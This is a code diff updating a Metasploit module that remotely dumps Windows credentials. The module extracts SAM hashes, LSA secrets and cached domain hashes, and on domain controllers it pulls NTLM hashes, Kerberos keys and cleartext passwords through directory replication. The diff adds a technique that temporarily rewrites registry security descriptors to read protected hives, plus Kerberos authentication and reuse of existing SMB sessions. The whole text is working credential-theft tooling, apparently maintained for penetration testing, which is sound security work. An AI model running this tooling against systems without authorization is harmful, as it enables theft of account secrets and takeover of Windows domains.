@@ -7,10 +7,10 @@ require 'ruby_smb/dcerpc/client'
 
 class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::SMB::Client::Authenticated
-  include Msf::Exploit::Remote::DCERPC
   include Msf::Auxiliary::Report
   include Msf::Util::WindowsRegistry
   include Msf::Util::WindowsCryptoHelpers
+  include Msf::OptionalSession::SMB
 
   # Mapping of MS-SAMR encryption keys to IANA Kerberos Parameter values
   #
@@ -33,11 +33,17 @@ class MetasploitModule < Msf::Auxiliary
         'Name' => 'Windows Secrets Dump',
         'Description' => %q{
           Dumps SAM hashes and LSA secrets (including cached creds) from the
-          remote Windows target without executing any agent locally. First, it
-          reads as much data as possible from the registry and then save the
-          hives locally on the target (%SYSTEMROOT%\Temp\random.tmp). Finally, it
-          downloads the temporary hive files and reads the rest of the data
-          from it. This temporary files are removed when it's done.
+          remote Windows target without executing any agent locally. This is
+          done by remotely updating the registry key security descriptor,
+          taking advantage of the WriteDACL privileges held by local
+          administrators to set temporary read permissions.
+
+          This can be disabled by setting the `INLINE` option to false and the
+          module will fallback to the original implementation, which consists
+          in saving the registry hives locally on the target
+          (%SYSTEMROOT%\Temp\<random>.tmp), downloading the temporary hive
+          files and reading the data from it. This temporary files are removed
+          when it's done.
 
           On domain controllers, secrets from Active Directory is extracted
           using [MS-DRDS] DRSGetNCChanges(), replicating the attributes we need
@@ -56,7 +62,8 @@ class MetasploitModule < Msf::Auxiliary
         'License' => MSF_LICENSE,
         'Author' => [
           'Alberto Solino', # Original Impacket code
-          'Christophe De La Fuente', # MSf module
+          'Christophe De La Fuente', # MSF module
+          'antuache' # Inline technique
         ],
         'References' => [
           ['URL', 'https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py'],
@@ -77,7 +84,16 @@ class MetasploitModule < Msf::Auxiliary
       )
     )
 
-    register_options([ Opt::RPORT(445) ])
+    register_options(
+      [
+        Opt::RPORT(445),
+        OptBool.new(
+          'INLINE',
+          [ true, 'Use inline technique to read protected keys from the registry remotely without saving the hives to disk', true ],
+          conditions: ['ACTION', 'in', %w[ALL SAM CACHE LSA]]
+        )
+      ]
+    )
 
     @service_should_be_stopped = false
     @service_should_be_disabled = false
@@ -151,7 +167,7 @@ class MetasploitModule < Msf::Auxiliary
       @lm_hash_not_stored = false
     end
   rescue RubySMB::Dcerpc::Error::WinregError => e
-    vprint_warning("An error occured when checking NoLMHash policy: #{e}")
+    vprint_warning("An error occurred when checking NoLMHash policy: #{e}")
   end
 
   def save_registry_key(hive_name)
@@ -170,7 +186,7 @@ class MetasploitModule < Msf::Auxiliary
 
   def retrieve_hive(hive_name)
     file_name = save_registry_key(hive_name)
-    tree2 = simple.client.tree_connect("\\\\#{sock.peerhost}\\ADMIN$")
+    tree2 = simple.client.tree_connect("\\\\#{simple.address}\\ADMIN$")
     file = tree2.open_file(filename: "Temp\\#{file_name}", delete: true, read: true)
     file.read
   ensure
@@ -193,8 +209,8 @@ class MetasploitModule < Msf::Auxiliary
     user, hash, type: :ntlm_hash, jtr_format: '', realm_key: nil, realm_value: nil
   )
     service_data = {
-      address: rhost,
-      port: rport,
+      address: simple.address,
+      port: simple.port,
       service_name: 'smb',
       protocol: 'tcp',
       workspace_id: myworkspace_id
@@ -216,8 +232,8 @@ class MetasploitModule < Msf::Auxiliary
 
   def report_info(data, type = '')
     report_note(
-      host: rhost,
-      port: rport,
+      host: simple.address,
+      port: simple.port,
       proto: 'tcp',
       sname: 'smb',
       type: type,
@@ -226,15 +242,15 @@ class MetasploitModule < Msf::Auxiliary
     )
   end
 
-  def dump_sam_hashes(reg_parser, boot_key)
+  def dump_sam_hashes(windows_reg, boot_key)
     print_status('Dumping SAM hashes')
     vprint_status('Calculating HashedBootKey from SAM')
-    hboot_key = reg_parser.get_hboot_key(boot_key)
+    hboot_key = windows_reg.get_hboot_key(boot_key)
     unless hboot_key.present?
       print_warning('Unable to get hbootKey')
       return
     end
-    users = reg_parser.get_user_keys
+    users = windows_reg.get_user_keys
     users.each do |rid, user|
       user[:hashnt], user[:hashlm] = decrypt_user_key(hboot_key, user[:V], rid)
     end
@@ -262,13 +278,13 @@ class MetasploitModule < Msf::Auxiliary
     end
   end
 
-  def get_lsa_secret_key(reg_parser, boot_key)
+  def get_lsa_secret_key(windows_reg, boot_key)
     print_status('Decrypting LSA Key')
-    lsa_key = reg_parser.lsa_secret_key(boot_key)
+    lsa_key = windows_reg.lsa_secret_key(boot_key)
 
     vprint_good("LSA key: #{lsa_key.unpack('H*')[0]}")
 
-    if reg_parser.lsa_vista_style
+    if windows_reg.lsa_vista_style
       vprint_status('Vista or above system')
     else
       vprint_status('XP or below system')
@@ -277,18 +293,21 @@ class MetasploitModule < Msf::Auxiliary
     return lsa_key
   end
 
-  def get_nlkm_secret_key(reg_parser, lsa_key)
+  def get_nlkm_secret_key(windows_reg, lsa_key)
     print_status('Decrypting NL$KM')
 
-    reg_parser.nlkm_secret_key(lsa_key)
+    windows_reg.nlkm_secret_key(lsa_key)
   end
 
-  def dump_cached_hashes(reg_parser, nlkm_key)
+  def dump_cached_hashes(windows_reg, nlkm_key)
     print_status('Dumping cached hashes')
 
-    cache_infos = reg_parser.cached_infos(nlkm_key)
+    cache_infos = windows_reg.cached_infos(nlkm_key)
     if cache_infos.nil? || cache_infos.empty?
-      print_status('No cashed entries')
+      print_warning('No cashed entries.')
+      if datastore['INLINE']
+        print_warning('This might be expected or you can still try again with the `INLINE` option set to false')
+      end
       return
     end
 
@@ -334,7 +353,7 @@ class MetasploitModule < Msf::Auxiliary
         realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
         realm_value: logon_domain_name
       }
-      if reg_parser.lsa_vista_style
+      if windows_reg.lsa_vista_style
         jtr_hash = "$DCC2$#{cache_info.real_iteration_count}##{username}##{cache_info.data.enc_hash.to_hex}:#{dns_domain_name}:#{logon_domain_name}"
       else
         jtr_hash = "M$#{username}##{cache_info.data.enc_hash.to_hex}:#{dns_domain_name}:#{logon_domain_name}"
@@ -349,7 +368,7 @@ class MetasploitModule < Msf::Auxiliary
     if hashes.empty?
       print_line('No cached hashes on this system')
     else
-      print_status("Hash#{'es' if hashes.lines.size > 1} are in '#{reg_parser.lsa_vista_style ? 'mscash2' : 'mscash'}' format")
+      print_status("Hash#{'es' if hashes.lines.size > 1} are in '#{windows_reg.lsa_vista_style ? 'mscash2' : 'mscash'}' format")
       print_line(hashes)
     end
   end
@@ -364,7 +383,7 @@ class MetasploitModule < Msf::Auxiliary
 
     svc_config.lp_service_start_name.to_s
   rescue RubySMB::Dcerpc::Error::SvcctlError => e
-    vprint_warning("An error occured when getting #{service_name} service account: #{e}")
+    vprint_warning("An error occurred when getting #{service_name} service account: #{e}")
     return nil
   ensure
     @svcctl.close_service_handle(svc_handle) if svc_handle
@@ -379,7 +398,7 @@ class MetasploitModule < Msf::Auxiliary
         bind: false
       )
     rescue RubySMB::Dcerpc::Error::WinregError => e
-      vprint_warning("An error occured when getting the default user name: #{e}")
+      vprint_warning("An error occurred when getting the default user name: #{e}")
       return nil
     end
     return nil if username.nil? || username.empty?
@@ -538,10 +557,16 @@ class MetasploitModule < Msf::Auxiliary
     print_line
   end
 
-  def dump_lsa_secrets(reg_parser, lsa_key)
+  def dump_lsa_secrets(windows_reg, lsa_key)
     print_status('Dumping LSA Secrets')
 
-    lsa_secrets = reg_parser.lsa_secrets(lsa_key)
+    lsa_secrets = windows_reg.lsa_secrets(lsa_key)
+    if lsa_secrets.empty?
+      print_warning('No LSA secrets to dump')
+      if datastore['INLINE']
+        print_warning('This might be expected or you can still try again with the `INLINE` option set to false')
+      end
+    end
     lsa_secrets.each do |key, secret|
       print_secret(key, secret)
     end
@@ -629,23 +654,53 @@ class MetasploitModule < Msf::Auxiliary
 
   def connect_drs
     dcerpc_client = RubySMB::Dcerpc::Client.new(
-      rhost,
+      simple.address,
       RubySMB::Dcerpc::Drsr,
       username: datastore['SMBUser'],
       password: datastore['SMBPass']
     )
 
+    auth_type = RubySMB::Dcerpc::RPC_C_AUTHN_WINNT
+    if datastore['SMB::Auth'] == Msf::Exploit::Remote::AuthOption::KERBEROS
+      fail_with(Msf::Exploit::Failure::BadConfig, 'The Smb::Rhostname option is required when using Kerberos authentication.') if datastore['Smb::Rhostname'].blank?
+      fail_with(Msf::Exploit::Failure::BadConfig, 'The SMBDomain option is required when using Kerberos authentication.') if datastore['SMBDomain'].blank?
+      fail_with(Msf::Exploit::Failure::BadConfig, 'The DomainControllerRhost is required when using Kerberos authentication.') if datastore['DomainControllerRhost'].blank?
+      offered_etypes = Msf::Exploit::Remote::AuthOption.as_default_offered_etypes(datastore['Smb::KrbOfferedEncryptionTypes'])
+      fail_with(Msf::Exploit::Failure::BadConfig, 'At least one encryption type is required when using Kerberos authentication.') if offered_etypes.empty?
+
+      kerberos_authenticator = Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::LDAP.new(
+        host: datastore['DomainControllerRhost'],
+        hostname: datastore['Smb::Rhostname'],
+        proxies: datastore['Proxies'],
+        realm: datastore['SMBDomain'],
+        username: datastore['SMBUser'],
+        password: datastore['SMBPass'],
+        framework: framework,
+        framework_module: self,
+        cache_file: datastore['Smb::Krb5Ccname'].blank? ? nil : datastore['Smb::Krb5Ccname'],
+        mutual_auth: true,
+        dce_style: true,
+        use_gss_checksum: true,
+        ticket_storage: kerberos_ticket_storage,
+        offered_etypes: offered_etypes
+      )
+
+      dcerpc_client.extend(Msf::Exploit::Remote::DCERPC::KerberosAuthentication)
+      dcerpc_client.kerberos_authenticator = kerberos_authenticator
+      auth_type = RubySMB::Dcerpc::RPC_C_AUTHN_GSS_NEGOTIATE
+    end
+
     dcerpc_client.connect
     vprint_status('Binding to DRSR...')
     dcerpc_client.bind(
       endpoint: RubySMB::Dcerpc::Drsr,
       auth_level: RubySMB::Dcerpc::RPC_C_AUTHN_LEVEL_PKT_PRIVACY,
-      auth_type: RubySMB::Dcerpc::RPC_C_AUTHN_WINNT
+      auth_type: auth_type
     )
     vprint_status('Bound to DRSR')
 
     dcerpc_client
-  rescue ::Rex::Proto::DCERPC::Exceptions::Error, ArgumentError => e
+  rescue RubySMB::Dcerpc::Error::DcerpcError, ArgumentError => e
     print_error("Unable to bind to the directory replication remote service (DRS): #{e}")
     return
   end
@@ -794,11 +849,19 @@ class MetasploitModule < Msf::Auxiliary
     users = get_domain_users
 
     dcerpc_client = connect_drs
+    unless dcerpc_client
+      print_error(
+        'Unable to connect to the directory replication remote service (DRS).'\
+        'Is the remote server a Domain Controller?'
+      )
+      return
+    end
     ph_drs = dcerpc_client.drs_bind
     dc_infos = dcerpc_client.drs_domain_controller_info(ph_drs, domain_name)
     user_info = {}
     dc_infos.each do |dc_info|
-      users.each do |sid, _name|
+      users.each do |user|
+        sid = user[0]
         crack_names = dcerpc_client.drs_crack_names(ph_drs, rp_names: [sid])
         crack_names.each do |crack_name|
           user_record = dcerpc_client.drs_get_nc_changes(
@@ -835,7 +898,7 @@ class MetasploitModule < Msf::Auxiliary
     end
 
     print_line("\n# NTLM hashes:")
-    user_info.each do |_sid, info|
+    user_info.each_value do |info|
       hash = "#{info[:lm_hash].unpack('H*')[0]}:#{info[:nt_hash].unpack('H*')[0]}"
       full_name = info[:domain_name].blank? ? info[:username] : "#{info[:domain_name]}\\#{info[:username]}"
       unless report_creds(full_name, hash, **credential_opts)
@@ -863,7 +926,7 @@ class MetasploitModule < Msf::Auxiliary
     end
 
     print_line("\n# Account Info:")
-    user_info.each do |_sid, info|
+    user_info.each_value do |info|
       print_line("## #{info[:dn]}")
       print_line("- Administrator: #{info[:admin]}")
       print_line("- Domain Admin: #{info[:domain_admin]}")
@@ -887,7 +950,7 @@ class MetasploitModule < Msf::Auxiliary
         "not stored, just replace it with the empty lmhash (#{Net::NTLM.lm_hash('').unpack('H*')[0]})"
       )
     end
-    user_info.each do |_sid, info|
+    user_info.each_value do |info|
       full_name = info[:domain_name].blank? ? info[:username] : "#{info[:domain_name]}\\#{info[:username]}"
 
       if info[:nt_history].size > 1 || info[:lm_history].size > 1
@@ -907,7 +970,7 @@ class MetasploitModule < Msf::Auxiliary
     end
 
     print_line("\n# Kerberos keys:")
-    user_info.each do |_sid, info|
+    user_info.each_value do |info|
       full_name = info[:domain_name].blank? ? info[:username] : "#{info[:domain_name]}\\#{info[:username]}"
 
       if info[:kerberos_keys].nil? || info[:kerberos_keys].empty?
@@ -932,7 +995,7 @@ class MetasploitModule < Msf::Auxiliary
     end
 
     print_line("\n# Clear text passwords:")
-    user_info.each do |_sid, info|
+    user_info.each_value do |info|
       full_name = "#{domain_name}\\#{info[:username]}"
 
       if info[:clear_text_passwords].nil? || info[:clear_text_passwords].empty?
@@ -960,6 +1023,7 @@ class MetasploitModule < Msf::Auxiliary
 
   def do_cleanup
     print_status('Cleaning up...')
+
     if @service_should_be_stopped
       print_status('Stopping service RemoteRegistry...')
       svc_handle = @svcctl.open_service_w(@scm_handle, 'RemoteRegistry')
@@ -971,7 +1035,7 @@ class MetasploitModule < Msf::Auxiliary
       @svcctl.change_service_config_w(svc_handle, start_type: RubySMB::Dcerpc::Svcctl::SERVICE_DISABLED)
     end
   rescue RubySMB::Dcerpc::Error::SvcctlError => e
-    vprint_warning("An error occured when cleaning up: #{e}")
+    vprint_warning("An error occurred when cleaning up: #{e}")
   ensure
     @svcctl.close_service_handle(svc_handle) if svc_handle
   end
@@ -984,7 +1048,7 @@ class MetasploitModule < Msf::Auxiliary
     @svcctl.bind(endpoint: RubySMB::Dcerpc::Svcctl)
     vprint_good('Bound to \\svcctl')
 
-    @svcctl.open_sc_manager_w(sock.peerhost)
+    @svcctl.open_sc_manager_w(simple.address)
   end
 
   def run
@@ -992,16 +1056,23 @@ class MetasploitModule < Msf::Auxiliary
       print_warning('Cannot find any active database. Extracted data will only be displayed here and NOT stored.')
     end
 
-    connect
-    begin
-      smb_login
-    rescue Rex::Proto::SMB::Exceptions::Error, RubySMB::Error::RubySMBError => e
-      fail_with(Module::Failure::NoAccess,
-                "Unable to authenticate ([#{e.class}] #{e}).")
+    if session
+      print_status("Using existing session #{session.sid}")
+      client = session.client
+      self.simple = ::Rex::Proto::SMB::SimpleClient.new(client.dispatcher.tcp_socket, client: client)
+      simple.connect("\\\\#{simple.address}\\IPC$") # smb_login connects to this share for some reason and it doesn't work unless we do too
+    else
+      connect
+      begin
+        smb_login
+      rescue Rex::Proto::SMB::Exceptions::Error, RubySMB::Error::RubySMBError => e
+        fail_with(Module::Failure::NoAccess, "Unable to authenticate ([#{e.class}] #{e}).")
+      end
     end
+
     report_service(
-      host: rhost,
-      port: rport,
+      host: simple.address,
+      port: simple.port,
       host_name: simple.client.default_name,
       proto: 'tcp',
       name: 'smb',
@@ -1009,7 +1080,7 @@ class MetasploitModule < Msf::Auxiliary
     )
 
     begin
-      @tree = simple.client.tree_connect("\\\\#{sock.peerhost}\\IPC$")
+      @tree = simple.client.tree_connect("\\\\#{simple.address}\\IPC$")
     rescue RubySMB::Error::RubySMBError => e
       fail_with(Module::Failure::Unreachable,
                 "Unable to connect to the remote IPC$ share ([#{e.class}] #{e}).")
@@ -1075,55 +1146,67 @@ class MetasploitModule < Msf::Auxiliary
     check_lm_hash_not_stored if @winreg
 
     if ['ALL', 'SAM'].include?(action.name)
-      begin
-        sam = save_sam
-      rescue RubySMB::Error::RubySMBError => e
-        if action.name == 'ALL'
-          print_warning("Error when getting SAM hive... skipping ([#{e.class}] #{e}).")
+      if @winreg
+        if datastore['INLINE']
+          print_status('Using `INLINE` technique for SAM')
+          windows_reg = Msf::Util::WindowsRegistry::RemoteRegistry.new(@winreg, name: :sam, inline: true)
         else
-          print_error("Error when getting SAM hive ([#{e.class}] #{e}).")
+          begin
+            sam = save_sam
+            windows_reg = Msf::Util::WindowsRegistry.parse(sam, name: :sam, root: 'HKLM\\SAM')
+          rescue RubySMB::Error::RubySMBError => e
+            print_error("Error when getting SAM hive ([#{e.class}] #{e})")
+          end
         end
-        sam = nil
-      end
 
-      if sam
-        reg_parser = Msf::Util::WindowsRegistry.parse(sam, name: :sam)
-        dump_sam_hashes(reg_parser, boot_key)
+        dump_sam_hashes(windows_reg, boot_key) if windows_reg
+      else
+        print_bad('Winreg client is not initialized, cannot dump SAM hashes')
       end
     end
 
     if ['ALL', 'CACHE', 'LSA'].include?(action.name)
-      begin
-        security = save_security
-      rescue RubySMB::Error::RubySMBError => e
-        if action.name == 'ALL'
-          print_warning("Error when getting SECURITY hive... skipping ([#{e.class}] #{e}).")
+      if @winreg
+        if datastore['INLINE']
+          print_status('Using `INLINE` technique for CACHE and LSA')
+          windows_reg = Msf::Util::WindowsRegistry::RemoteRegistry.new(@winreg, name: :security, inline: true)
         else
-          print_error("Error when getting SECURITY hive ([#{e.class}] #{e}).")
-        end
-        security = nil
-      end
-
-      if security
-        reg_parser = Msf::Util::WindowsRegistry.parse(security, name: :security)
-        lsa_key = get_lsa_secret_key(reg_parser, boot_key)
-        if lsa_key.nil? || lsa_key.empty?
-          print_status('No LSA key, skip LSA secrets and cached hashes dump')
-        else
-          report_info(lsa_key.unpack('H*')[0], 'host.lsa_key')
-          if ['ALL', 'LSA'].include?(action.name)
-            dump_lsa_secrets(reg_parser, lsa_key)
+          begin
+            security = save_security
+            windows_reg = Msf::Util::WindowsRegistry.parse(security, name: :security, root: 'HKLM\\SECURITY')
+          rescue RubySMB::Error::RubySMBError => e
+            print_error("Error when getting SECURITY hive ([#{e.class}] #{e})")
           end
-          if ['ALL', 'CACHE'].include?(action.name)
-            nlkm_key = get_nlkm_secret_key(reg_parser, lsa_key)
-            if nlkm_key.nil? || nlkm_key.empty?
-              print_status('No NLKM key (skip cached hashes dump)')
-            else
-              report_info(nlkm_key.unpack('H*')[0], 'host.nlkm_key')
-              dump_cached_hashes(reg_parser, nlkm_key)
+        end
+
+        if windows_reg
+          lsa_key = get_lsa_secret_key(windows_reg, boot_key)
+          if lsa_key.nil? || lsa_key.empty?
+            print_warning('No LSA key, skip LSA secrets and cached hashes dump')
+            if datastore['INLINE']
+              print_warning('This might be expected or you can still try again with the `INLINE` option set to false')
+            end
+          else
+            report_info(lsa_key.unpack('H*')[0], 'host.lsa_key')
+            if ['ALL', 'LSA'].include?(action.name)
+              dump_lsa_secrets(windows_reg, lsa_key)
+            end
+            if ['ALL', 'CACHE'].include?(action.name)
+              nlkm_key = get_nlkm_secret_key(windows_reg, lsa_key)
+              if nlkm_key.nil? || nlkm_key.empty?
+                print_warning('No NLKM key (skip cached hashes dump)')
+                if datastore['INLINE']
+                  print_warning('This might be expected or you can still try again with the `INLINE` option set to false')
+                end
+              else
+                report_info(nlkm_key.unpack('H*')[0], 'host.nlkm_key')
+                dump_cached_hashes(windows_reg, nlkm_key)
+              end
             end
           end
         end
+      else
+        print_bad('Winreg client is not initialized, cannot dump LSA secrets and cached hashes')
       end
     end
 
@@ -1146,8 +1229,11 @@ class MetasploitModule < Msf::Auxiliary
     end
     @winreg.close if @winreg
     @tree.disconnect! if @tree
-    simple.client.disconnect! if simple&.client.is_a?(RubySMB::Client)
-    disconnect
+    # Don't disconnect the client if it's coming from the session so it can be reused
+    unless session
+      simple.client.disconnect! if simple&.client.is_a?(RubySMB::Client)
+      disconnect
+    end
   end
 
   private
